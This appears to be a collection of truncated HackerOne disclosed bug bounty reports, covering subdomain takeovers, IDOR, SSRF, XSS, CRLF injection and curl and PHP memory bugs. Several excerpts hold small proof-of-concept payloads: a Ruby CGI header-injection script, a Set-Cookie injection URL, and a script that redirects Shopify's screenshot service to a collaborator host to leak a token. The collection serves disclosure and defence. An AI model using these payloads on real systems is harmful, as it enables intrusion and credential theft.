Gratipay: Gratipay uses the random module's cryptographically insecure PRNG.
Dear Gratipay bug bounty team, Summary --- Gratipay currently uses the random module's pseudo-random number generator which is not a cryptographically secure PRNG as stated in the docs: The pseudo-random generators of this module should not be used for security purposes. For security or...
HackerOne: Internal attachments can be exported via "Export as .zip" feature
Hello HackerOne Team. This newly disclosed report, 182358 "Partial disclosure of report activity through new "Export as .zip" feature", was not completely fixed. I have found that I can still view the attachment after it has been removed on the thread. Best PoC is this 182358 since this is the newly fi...
Ubiquiti Inc.: Subdomain Takeover (moderator.ubnt.com)
Hello Team This report is same as 179110 One of your subdomain http://moderator.ubnt.com is pointing towards 216.58.203.243 moderator.ubnt.com 216.58.203.243 ghs.google.com 216.58.203.243 ghs.l.google.com F134183 And it is unclaimed When I open it it is showing F134184 Impact :- An attacker can...
Shopify: Add signature to transactions without any permission
Hi, I found an endpoint for transaction signing but user permission is not checked on this endpoint, so a user without any permission in the shop can add a signature to transactions! Endpoint: /admin/securefiles.json Parameters:...
Internet Bug Bounty: Cross-protocol attack on TLS using SSLv2 (DROWN) (CVE-2016-0800)
General DROWN was responsibly disclosed to the OpenSSL team prior to the public disclosure. This OpenSSL blog post, by Viktor Dukhovni and Emilia Käsper, describes the vulnerability: https://www.openssl.org/blog/blog/2016/03/01/an-openssl-users-guide-to-drown/ This is probably a good opportunity ...
Paragon Initiative Enterprises: SMTP server allows anonymous relay from internal addresses to internal addresses
Hello, Issue description: your incoming SMTP servers, provided by Google, seem to be accepting, without authentication, mails from addresses @paragonie.com and destined for addresses @paragonie.com. This can greatly ease spear-phishing attacks, as users usually put much trust into emails coming fro...
Bumble: Account Takeover
Hello, this is regarding an account takeover via the import image from Facebook option. When we import FB photos, a link with a token is generated which is valid for any user, and it can be used to replace the user's linked FB account with the attacker's FB account, and then login via FB to take over the account. Note: I tested...
Ruby on Rails: Regarding [CVE-2016-0752] Possible Information Leak Vulnerability in Action View
Possible Information Leak Vulnerability in Action View. There is a possible directory traversal and information leak vulnerability in Action View. This was meant to be fixed on CVE-2016-0752. However the 3.2 patch was not covering all the scenarios. This vulnerability has been assigned the CVE...
Radancy: SSL certificate invalid date
This SSL certificate is either expired or not yet valid. Some browsers will continue connecting to the site after presenting the user with the warning, while others will prompt the user with a dialog box requesting their approval to proceed. These warnings are extremely confusing for the typical...
Internet Bug Bounty: Integer overflow in unserialize() (32-bits only)
https://bugs.php.net/bug.php?id=68044...
curl: Security Analysis Report: CURL Integer Overflow Vulnerability
Vulnerability Overview Vulnerability Type: Integer Overflow in HTTP chunked encoding Location in Source: lib/http_chunks.c line 173, lib/curlx/strparse.c lines 185–186 Impact: Integer overflow leads to memory corruption; can cause buffer overflow; results in Denial of Service (DoS) for curl. Potential...
curl: CVE-2024-6874: macidn punycode buffer overread
The libcurl at commit 58772b0e082eda333e0a5fc8fb0bc7f17a3cd99c contained a stack-buffer overread in the function mac_idn_to_ascii that could be triggered when the host of a URL was converted to punycode. The root cause was in the function uidna_nameToASCII_UTF8, which left the output buffer unterminat...
curl: Buffer Overflow Vulnerability in WebSocket Handling
Vulnerability description not provided...
FetLife: Able to see highest poll result without voting or view result
Vulnerability description not provided...
HackerOne: Hacker email disclosed on submission at hackerone hactivity
Vulnerability description not provided...
HackerOne: Takeover of hackerone.engineering via Github
The hacker was able to take over the hackerone.engineering domain after a brief misconfiguration window on GitHub. They claimed the domain in their own repository while the DNS records were still pointing towards GitHub. The issue has been resolved and no malware was found on the site during the...
GitHub: Authentication bypass on gist.github.com through SSH Certificates
An authentication bypass vulnerability was found in GitHub Enterprise Server that allowed unauthorized access to modify other users' secret gists through SSH certificates. The vulnerability affected all versions of GitHub Enterprise Server prior to 3.9 and was fixed in versions 3.4.18, 3.5.15,...
Nextcloud: Mail app - blind SSRF via smtpHost parameter
A blind SSRF vulnerability was discovered in the Nextcloud Mail application, allowing an attacker to retrieve services running locally on the server and scan the internal network for information. The vulnerability was found in the smtpHost parameter and could be exploited by any user with the mai...
GitLab: Stored-XSS with CSP-bypass via labels' color
Stored-XSS with CSP-bypass was discovered in GitLab that allowed attackers to execute arbitrary actions on behalf of victims at the client side. This was possible due to the import of unsanitized label colors from GitHub, which led to the execution of malicious JavaScript code...
U.S. Dept Of Defense: CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
A vulnerability in the web services interface of Cisco Adaptive Security Appliance ASA Software and Cisco Firepower Threat Defense FTD Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted...
EXNESS: subdomain takeover at odoo-staging.exness.io
Domain: https://odoo-staging.exness.io PoC https://odoo-staging.exness.io Cname: $ host odoo-staging.exness.io odoo-staging.exness.io is an alias for exness-stg.odoo.com. exness-stg.odoo.com has address 141.95.172.222 exness-stg.odoo.com mail is handled by 10 eu123a.odoo.com. Impact Scam, phishin...
Zomato: Attacker shall receive order updates on WhatsApp for users who have activated WhatsApp notification
H Summary: 1. Order IDs are IDOR (Insecure Direct Object Reference) 2. When users activated WhatsApp notification an attacker would start receiving the notification about their order without user interaction. Proof Of Concept:- When a user orders at a restaurant he/she can start WhatsApp notificati...
Nextcloud: SMTP Command Injection in iCalendar Attachments to Emails via Newlines
Note: This is similar to 1509216, but has a new source/attack vector. Apologies for not picking this up earlier. Summary: When users receive iCalendar attachments in Mail, there is an option to add it to their calendar: ██████████ Once they add it to calendar, a PUT request is sent: PUT...
U.S. Dept Of Defense: Expired SSL Certificate allows credentials steal
Hi security Team! I've found this website with no valid SSL Certificate. https://██████████ Certificate has expired 314 days ago. Impact Error message can appear on page and user can have his credentials stolen by an attacker capturing the network data. System Hosts ███████ Affected Products and...
GitHub Security Lab: Python: Add support of clickhouse-driver package
This bug was reported directly to GitHub Security Lab...
Reddit: XSS
Hi security team, I have found an XSS in old.reddit.com and in reddit.com. Description: Cross-site scripting, also known as XSS, is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the...
Ruby: Ruby's CGI library has HTTP response splitting (HTTP header injection), leaking secret information
PoC1: #!/usr/bin/env ruby require 'cgi' cgi = CGI.new url = "http://example.jp\r\nSet-Cookie: foo=bar;" (external parameter) print cgi.header('status' => '302 Found', 'Location' => url) Actual Result1: $ curl -s -i http://localhost:8080/cgi-bin/cgi.ru HTTP/1.1 302 Found Date: Fri, 21 May 2021 00:46:33 G...
curl: CVE-2021-22901: TLS session caching disaster
Summary: lib/vtls/openssl.c ossl_connect_step1 sets up the ossl_new_session_cb sessionid callback with SSL_CTX_sess_set_new_cb, and adds association from data_idx and connectdata_idx to current conn and data respectively: SSL_CTX_set_session_cache_mode(backend->ctx, SSL_SESS_CACHE_CLIENT | SSL_SESS_CACHE_NO_INTERNAL);...
Open-Xchange: Null pointer dereference in lib-sieve after calling sieve_binary_block_index
There are some places where the program calls the function sieve_binary_block_index without checking the return value, mainly in sieve-binary-dumper.c. Such as: pigeonhole/src/lib-sieve/sieve-binary-dumper.c: bool sieve_binary_dumper_run(struct sieve_binary_dumper *dumper, struct ostream *stream, bool verbose) { struct...
Rockstar Games: Open redirect on https://signin.rockstargames.com/connect/authorize/rsg
In this report, the researcher found that a previously-addressed Open Redirect vulnerability on https://signin.rockstargames.com/connect/authorize/rsg had once again become exploitable. We were able to quickly re-apply our previous solution and once again resolve the vulnerability...
Shopify: Screenshot Service leaks X-ABS-App-Token
1. Login and create a development store 2. Start Burp Suite and open a Burp Collaborator client, then copy the collaborator payload 3. Edit the section header.liquid of your current theme, adding this: window.location="https://pasteherecollaborator/"; Finally go to...
U.S. Dept Of Defense: IDOR to Account Takeover on https://████/index.html
Hello Team! Summary: I found when you wish to update your profile on https://███████/ after your login through https://██████████/signIn/signIn.html website due to an IDOR. This IDOR gives you the opportunity to change the origin email for the registered account by changing the ID parameter on th...
U.S. Dept Of Defense: [██████████.mil] Cisco VPN Service Path Traversal
Hi team. Summary The Cisco VPN Service at ██████.mil is vulnerable to the CVE-2020-3452 vulnerability, which allows path traversing within the web service's file system on the targeted device. Steps to Reproduce Make a GET request to: http...
Node.js third-party modules: [keyd] Prototype pollution
I would like to report a prototype pollution vulnerability in keyd module. It allows an attacker to inject properties on Object.prototype. Module module name: keyd version: 1.3.4 npm page: https://www.npmjs.com/package/keyd Module Description A small library for using and manipulating key paths i...
Internet Bug Bounty: PHP link() silently truncates after a null byte on Windows
The bug submitted at: https://bugs.php.net/bug.php?id=78862 The security advisory at: https://nvd.nist.gov/vuln/detail/CVE-2019-11044 The issue allows remote attackers to read or write arbitrary files via crafted input to an application that calls the vulnerable function. As demonstrated by a...
Node.js: napi_get_value_string_X allow various kinds of memory corruption
Summary: napi_get_value_string_latin1, napi_get_value_string_utf8, napi_get_value_string_utf16 are vulnerable to buffer overflows, partially due to an integer underflow. Description: napi_get_value_string_latin1, napi_get_value_string_utf8, and napi_get_value_string_utf16 behave like this: 1. If the output pointer is...
U.S. Dept Of Defense: Publicly accessible Grafana install allows pivoting to Prometheus datasource
Summary: A publicly accessible Grafana install exposes semi-sensitive dashboards. This also exposes the Prometheus proxied datasources, which allow direct queries to a Prometheus instance; this reveals sensitive data and opens the instance up to potential DoS via crafted requests. Description: Impa...
DataStax: Helpdesk Takeover at dmc.datastax.com
Summary: DNS record dmc.datastax.com is pointing to stale dmc-support.zendesk.com domain on Zendesk which is available for takeover. DNS Stale Records: F661014 Proof of Concept: There was no helpdesk configured at this address, which means that the address was available and anyone could claim it....
GitLab: Head pipeline leaked to unauthorized users via blocking merge request feature
Summary GitLab allows for public and internal projects to restrict the visibility of pipelines to project members only. Then, only project members should have access to the pipeline information. GitLab recently added the blocking merge request feature. This feature can be used to leak the head...
Internet Bug Bounty: Out of Bounds Memory Read in php_jpg_get16
I have found and reported an out of bounds memory read in PHP php_jpg_get16. When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data function, in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 it is possible to supply it with data that will...
curl: Insecure Frame (External)
Summary: Insecure Frame External Steps To Reproduce: Vulnerability Details identified an external insecure or misconfigured iframe. Remedy Apply sandboxing in inline frame For untrusted content, avoid the usage of seamless attribute and allow-top-navigation, allow-popups and allow-scripts in...
Snapchat: Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
Hey there, I was looking at your ads site with @daeken, we found some weird behavior in the import function of the creative app. Here are the steps: POC - Login to https://business.snapchat.com/ - Go to creative library - New Creative - Under "Topsnap Media", click on "Create" - Click on any of t...
Nextcloud: Predictable Random Number Generator
Description: The mobile application uses a predictable Random Number Generator RNG. Under certain conditions this weakness may jeopardize mobile application data encryption or other protection based on randomization. For example, if encryption tokens are generated inside of the application and an...
RATELIMITED: information disclosure which leak the apache version
Hello ratelimited team! I have found an information disclosure which leaks the Apache version. Link: https://social.ratelimited.me/manual/en/index.html Impact: Leaking the HTTP Apache server version...
h1-5411-CTF: H1-5411 CTF Writeup
So, HackerOne posted a tweet about the Meme CTF where a barcode was in the tweet image; by scanning it and decoding from hex I found this link: https://h1-5411.h1ctf.com/ where we can create/generate memes, and for generating the meme this was used form GitHub which I found in source code analysis...
Node.js third-party modules: [cloudcmd] Stored XSS in the filename when directories listing
I would like to report a Stored XSS issue in module cloudcmd It allows executing malicious javascript code in the user's browser. Module module name: cloudcmd version: 9.1.5 npm page: https://www.npmjs.com/package/cloudcmd Module Description Cloud Commander is an orthodox web file manager with...
Mail.ru: [dl.beepcar.ru] CRLF Injection
CRLF Injection via Get request PoC: https://dl.beepcar.ru/qwerty%0ASet-Cookie:%20test=qwerty;domain=.beepcar.ru HTTP Response: HTTP/1.1 302 Moved Temporarily Server: nginx/1.12.2 Date: Tue, 03 Apr 2018 19:20:31 GMT Content-Type: text/html Content-Length: 161 Connection: close Location:...
Mapbox: Admin Panel Accessed (OAuth Bypassed )
On December 4, 2017, @aneeskhan reported an authentication bypass vulnerability on a Mapbox internal portal. The vulnerability allowed them to bypass OAuth authentication and generate a valid session for the site. This session was then used by @aneeskhan to access information on the portal which...
Gratipay: i am The bug
I am the bug. I found a bug in your site, here it is F234717. My friends are the greatest hackers hackerone.com/s4k16 and smziaurrashid told me you will give me $$$ for my father F234723...
WakaTime: Mailgun misconfiguration
During subdomain enumeration I found the following subdomain: email.mailgun.wakatime.com Looking at the CNAME records, it is pointing to Mailgun. host email.mailgun.wakatime.com email.mailgun.wakatime.com is an alias for mailgun.org. mailgun.org has address 34.225.110.231 mailgun.org has address...